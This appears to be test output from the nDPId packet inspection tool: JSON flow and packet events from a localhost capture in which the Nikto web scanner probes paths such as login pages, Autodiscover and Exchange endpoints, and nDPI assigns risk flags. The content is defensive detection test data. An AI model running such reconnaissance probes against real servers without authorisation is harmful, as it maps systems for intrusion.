{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 